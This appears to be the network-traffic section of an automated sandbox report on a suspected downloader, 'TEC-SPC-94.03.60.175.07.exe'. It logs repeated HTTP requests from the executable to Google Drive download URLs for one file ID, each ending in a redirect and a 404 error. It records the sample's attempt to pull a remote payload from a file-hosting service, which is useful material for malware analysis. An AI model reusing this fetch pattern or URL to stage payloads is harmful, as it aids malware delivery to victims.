                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.649784142.250.181.14434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:57:38 UTC258OUTGET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        2024-12-16 16:57:39 UTC2219INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC7_J-d-kUnNcZJuem94ZrY18AGb6irGmIf4YdlPYqVfSJ5y96NFG_QqOar-QJlWxvzA
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:38 GMT
                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-RjjFy2oloISL-BILCeSdbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Set-Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz; expires=Tue, 17-Jun-2025 16:57:38 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:57:39 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 68 62 52 71 78 65 6b 33 49 79 4a 6a 32 5a 45 42 6c 37 4a 5f 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZhbRqxek3IyJj2ZEBl7J_A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.649790172.217.19.1744434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:57:40 UTC418OUTGET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:57:41 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:41 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-mceV9CpLal9e22HXHeR_hw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.649796142.250.181.14434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:57:43 UTC460OUTGET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:57:44 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC5mzjZJ1NFRpZh4ZMqh395b73KuHDMHpEgaQDF2vwMLduOaoqCYvlMp_MYG3wjklfY-
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:44 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-cr-JOXlWaUrE5GZfAAnGbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:57:44 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 77 62 62 71 2d 4f 56 4c 6a 6b 62 50 6d 55 4c 42 4b 5f 4e 74 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Bwbbq-OVLjkbPmULBK_Ntw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.649807172.217.19.1744434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:57:46 UTC418OUTGET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:57:47 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:46 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-y0VlCuuFl7FAA96NeXOdaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.649814142.250.181.14434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:57:48 UTC460OUTGET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:57:49 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC5nw7cjBzLm7BtzbEOlRDK4FZ7pAF95XnR5_6L8wV-p8HJTgEZa_18U28XVf5s1_vfv
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:49 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-FeAwgmcsX4Tmc1sGs1Y0Gg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:57:49 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 4d 77 4e 6c 47 79 72 32 77 5a 45 42 6c 30 30 75 70 44 4a 57 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FMwNlGyr2wZEBl00upDJWw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.649820172.217.19.1744434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:57:52 UTC418OUTGET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:57:53 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:52 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-_AZ2QOMbdh1qWFmkCt7PxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.649826142.250.181.14434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:57:54 UTC460OUTGET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:57:55 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC6Sosdq_AGSw5wUv9M5HRx-BKBdm8xImR4rjZnEnaFxetA17cdkb9OyEAiD8YcLOxAT
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:55 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-0GQwbYS0UpQC8Y0D7-z3Jw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:57:55 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 74 71 6b 52 43 42 62 66 4f 62 5a 4e 70 39 74 7a 6f 41 76 68 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VtqkRCBbfObZNp9tzoAvhw">*{margin:0;padding:0}html,code{font:15px/22px arial


